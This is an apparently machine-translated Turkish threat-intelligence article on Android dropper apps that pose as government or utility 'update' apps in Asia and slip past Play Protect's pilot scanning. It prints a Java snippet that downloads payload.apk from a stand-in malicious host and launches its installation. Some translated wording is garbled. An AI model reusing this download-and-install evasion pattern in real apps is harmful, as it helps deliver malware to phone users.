Android Droppers, ağır bankacılık truva atları için niş montajcılardan evrensel dağıtım çerçevelerine dönüştü ve ilkel casus yazılım veya SMS stealer’ları bile kullanabilir.
Başlangıçta, Droppers, kimlik bilgilerini hasat etmek için yüksek erişilebilirlik izinleri gerektiren bankacılık kötü amaçlı yazılım ailelerine hizmet etti.
Bu küçük uygulamalar ilk bakışta zararsız görünüyordu, genellikle yüksek riskli bölgelerde kamu hizmeti veya hükümet uygulamaları olarak maskelendi. Kurulduktan sonra, gerçek yüklerini alırlar, güçlü izinler isterler ve kötü amaçlı rutinlerini etkinleştirirler.
Savunucular kurma öncesi taramayı güçlendirdikçe, tehdit aktörleri yaklaşımlarını yeniden düşünmeye başladı.
Son aylarda, Asya’yı (özellikle Hindistan ve Güneydoğu Asya) hedefleyen damlalık temelli kampanyalarda bir artış ortaya çıktı. Sadece karmaşık sıçanlara veya finansal truva atlarına güvenmek yerine, rakipler artık damlalık kabukları içindeki basit yükleri kapsıyor.
Bu strateji, Google Play Protect’in pilot programındaki kritik bir boşluktan yararlanır, bu da bir öncü izni ve API taraması gerçekleştirir, ancak kullanıcı onaylaması durumunda kurulumun devam etmesine izin verir.
Tehdit kumaş analistleri, bu pivotun sadece ön savunmaları değil, aynı zamanda geleceğe dayanıklı operasyonları da atladığını ve damlacının kendisini değiştirmeden hızlı yük takaslarını sağladığını belirtti.
Yüksek riskli izinler taşımayan minimalist aşama bir kodu yerleştirerek, modern damlalar tespit edilmemiş pilot program denetimlerinden geçer.
.webp)
Tehdit kumaş araştırmacıları, Monero madenci ve geri dönüş casus yazılımından çıkarılan, gürültüyü azaltmak ve algılamadan kaçmak için sadece damlalık mantığını koruyarak RewardDropMiner.b gibi varyantları belirlediler.
.webp)
İyi huylu “güncelleme” istemi bir kullanıcı tarafından kabul edildikten sonra, gizli bir rutin ikincil APK’yı getirir veya şifresini çözer, bu da sadece gerçek yükün ilk başlatılmasından sonra petal_sms veya bind_notifikasyon izinlerini dinamik olarak talep eder.
Bu kampanyaların etkisi iki yönlüdür: savunucular kötü niyetli faaliyetlere erken görünürlüğünü kaybeder ve operatörler keyfi yükler sağlayabilen istikrarlı bir tabanı sürdürmektedir.
Bu modülerlik, tehdit aktörlerinin komut ve kontrol altyapılarında barındırılan değişmemiş bir damlalık kabuğunun arkasına yeni yükler yükleyerek güvenlik güncellemelerine veya kolluk kuvvetlerini hızla tepki vermelerine olanak tanır.
Enfeksiyon mekanizması ve kaçaklama taktikleri
Enfeksiyon mekanizmasına girilmesi, gizli ve esneklik için tasarlanmış çok aşamalı bir süreci ortaya çıkarır. Dropper’ın tezahürü yalnızca İnternet ve Request_install_packages izinlerini bildirir ve Play Protect’in pilot taramasındaki bayraklardan kaçınır.
“Güncelleme” arabirimi ile kullanıcı etkileşimi üzerine, damlalık uzak bir sunucuya bir HTTPS isteği başlatır:-
String payloadUrl = "https://malicious.example.com/payload.apk";
OkHttpClient client = new OkHttpClient();
Request request = new Request.Builder().url(payloadUrl).build();
Response response = client.newCall(request).execute();
if (response.isSuccessful()) {
File apk = new File(getExternalFilesDir(null), "payload.apk");
try (FileOutputStream fos = new FileOutputStream(apk)) {
fos.write(response.body().bytes());
}
Intent installIntent = new Intent(Intent.ACTION_VIEW);
installIntent.setDataAndType(
FileProvider.getUriForFile(this, getPackageName()+".provider", apk),
"application/vnd.android.package-archive"
);
installIntent.addFlags(Intent.FLAG_GRANT_READ_URI_PERMISSION);
startActivity(installIntent);
}Bu snippet, damlacının yüksek riskli izin uyarılarını tetiklemeden yükün yüklenmesini ve yüklenmesini istemek için standart API’ları kullanmasını örneklendirir.
Kurulumdan sonra, yükün başlatıcı etkinliği, bu noktada Play Protect, kullanıcıyı uyarabilir – ancak ilk damlalık aktarımına güven yeni yüklenen uygulamaya kadar uzandığı için kullanıcıyı uyarabilir.
Bu kaçırma taktikleri, savunucuların ön ve sonrası taramaları ilişkilendirme ve yandan yüklü uygulama davranışını sürekli olarak izlemeye yönelik acil bir ihtiyaç olduğunu vurgulamaktadır.
Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.